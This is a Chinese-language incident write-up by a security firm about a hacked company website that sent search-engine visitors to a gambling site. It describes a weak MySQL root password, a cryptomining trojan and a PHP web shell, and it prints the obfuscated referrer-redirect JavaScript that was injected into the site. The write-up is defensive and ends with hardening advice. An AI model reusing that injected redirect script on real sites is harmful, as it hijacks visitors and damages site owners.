當(dāng)前位置:首頁(yè) >  站長(zhǎng) >  網(wǎng)站運(yùn)營(yíng) >  正文

如何解決公司網(wǎng)站首頁(yè)被惡意跳轉(zhuǎn)的安全問(wèn)題

 2018-07-26 14:24  來(lái)源: 用戶(hù)投稿   我來(lái)投稿 撤稿糾錯(cuò)

  域名預(yù)訂/競(jìng)價(jià),好“米”不錯(cuò)過(guò)

近日某客戶(hù)網(wǎng)站被黑,導(dǎo)致網(wǎng)站首頁(yè)被篡改并跳轉(zhuǎn)到賭博網(wǎng)站,網(wǎng)站在百度的收錄也收錄了一些什么彩票內(nèi)容的快照,網(wǎng)站首頁(yè)快照也被修改成賭博內(nèi)容,并被百度直接紅色風(fēng)險(xiǎn)攔截提示,百度網(wǎng)址安全中心提醒您:該站點(diǎn)可能受到黑客攻擊,部分頁(yè)面已被非法篡改!我們SINE安全公司根據(jù)以上客戶(hù)被黑的情況,立即進(jìn)行了全面的網(wǎng)站安全檢測(cè),針對(duì)網(wǎng)站被黑的情況制定了詳細(xì)的安全部署方案。

首先客戶(hù)網(wǎng)站使用的是Linux centos系統(tǒng)服務(wù)器,客戶(hù)提供服務(wù)器ip,ssh端口,root賬號(hào)密碼后,我們進(jìn)去查看了服務(wù)器是否存在被黑以及系統(tǒng)木馬后門(mén)的情況,再一個(gè)我們對(duì)其使用的mysql數(shù)據(jù)庫(kù)進(jìn)行了安全檢測(cè),發(fā)現(xiàn)問(wèn)題,該mysql數(shù)據(jù)庫(kù)的root賬號(hào)使用的是弱口令密碼,導(dǎo)致攻擊者可以利用軟件對(duì)數(shù)據(jù)庫(kù)進(jìn)行強(qiáng)力破解,導(dǎo)致破解成功,利用root權(quán)限直接提權(quán)并上傳腳本木馬到網(wǎng)站的根目錄下。

根據(jù)上面發(fā)現(xiàn)的數(shù)據(jù)庫(kù)安全問(wèn)題,我們深度挖掘,追蹤溯源,發(fā)現(xiàn)服務(wù)器還存在木馬后門(mén),top,查看linux當(dāng)前進(jìn)程,發(fā)現(xiàn)一個(gè)可疑的進(jìn)程,通過(guò)查看進(jìn)程的詳細(xì)信息我們發(fā)現(xiàn)該進(jìn)程是木馬后門(mén)進(jìn)程,再仔細(xì)一檢查發(fā)現(xiàn)該木馬是挖礦木馬,攻擊者利用服務(wù)器資源,帶寬,進(jìn)行挖礦,像比特幣、以太坊等幣進(jìn)行挖礦。

我們對(duì)其挖礦木馬進(jìn)行安全分析:如下圖

解密木馬內(nèi)容,我們發(fā)現(xiàn)該木馬目前來(lái)說(shuō)是免殺的木馬,一般人是看不出問(wèn)題來(lái),但是經(jīng)常維護(hù)服務(wù)器的運(yùn)維人員就會(huì)察覺(jué)出來(lái),第一該木馬隱藏到linux進(jìn)程當(dāng)中去,根據(jù)時(shí)間段進(jìn)行挖礦,避開(kāi)高峰時(shí)間,以及維護(hù)人員的工作時(shí)間,當(dāng)挖礦的時(shí)候木馬進(jìn)程CPU占用達(dá)到百分之80以上,甚至有時(shí)候網(wǎng)站都打開(kāi)很慢。服務(wù)器的木馬查完后,我們對(duì)網(wǎng)站的源代碼進(jìn)行安全檢測(cè),發(fā)現(xiàn)網(wǎng)站目錄里被上傳了網(wǎng)站木馬后門(mén),php腳本木馬,該腳本木馬可以對(duì)網(wǎng)站進(jìn)行讀寫(xiě)新建等操作,網(wǎng)站的首頁(yè)標(biāo)題描述也被改成了什么賭博的內(nèi)容如下圖:

<>eval(function(p,a,c,k,e,d){e=function(c){return(c

(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString

(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=

[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)

if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}

('3.4("");3.4("d 1=3.f");3.4("e(1.2(\\"7\\")>0 || 1.2(\

\"6\\")>0 || 1.2(\\"8\\")>0 ||1.2(\\"a\\")>0 ||1.2(\\"9\\")>0 ||1.2(\

\"l\\")>0 ||1.2(\\"m\\")>0 ||1.2(\\"k\\")>0 )");3.4("h.g=\\"j://i.o.n\

\";");3.4("");',25,25,'|s|indexOf|document|writeln||sogou|

baidu|soso|uc|sm|Java|LANGUAGE|var|if|referrer|href|location|www|

http|so|bing|yahoo|com|268238'.split('|'),0,{}))

通過(guò)解密上面的代碼發(fā)現(xiàn),只要是從百度,搜狗,以及soso,so,bing等搜索引擎來(lái)的訪問(wèn),都會(huì)直接跳轉(zhuǎn)到攻擊者設(shè)定好的賭博網(wǎng)站上去。隨即我們SINE安全公司對(duì)該惡意代碼進(jìn)行了清除,網(wǎng)站恢復(fù)正常訪問(wèn)。

以上就是我們解決客戶(hù)網(wǎng)站安全的整個(gè)過(guò)程,下面針對(duì)于此次網(wǎng)站被黑,提供如下 的網(wǎng)站安全建議:

1.對(duì)mysql數(shù)據(jù)庫(kù)進(jìn)行安全部署,對(duì)root賬號(hào)密碼加密,盡可能設(shè)置的復(fù)雜一些,數(shù)字+大小寫(xiě)字母+特殊符號(hào),對(duì)網(wǎng)站數(shù)據(jù)庫(kù)進(jìn)行分配普通權(quán)限賬號(hào)。

2.mysql數(shù)據(jù)庫(kù)默認(rèn)端口3306,改為51158,并加入到端口安全策略,不對(duì)外開(kāi)放,外網(wǎng)IP無(wú)法連接數(shù)據(jù)庫(kù),只有本地127.0.0.1才能進(jìn)行連接數(shù)據(jù)庫(kù),以防止攻擊者惡意猜測(cè)。

3.對(duì)服務(wù)器底層系統(tǒng)進(jìn)行安全加固,包括SSH登錄的安全驗(yàn)證。

4.對(duì)網(wǎng)站代碼進(jìn)行整體的安全檢測(cè),包括定期的升級(jí)網(wǎng)站程序源代碼,修復(fù)補(bǔ)丁以及網(wǎng)站漏洞。

申請(qǐng)創(chuàng)業(yè)報(bào)道,分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處,共同探討創(chuàng)業(yè)新機(jī)遇!

相關(guān)標(biāo)簽
網(wǎng)站安全

相關(guān)文章

熱門(mén)排行

信息推薦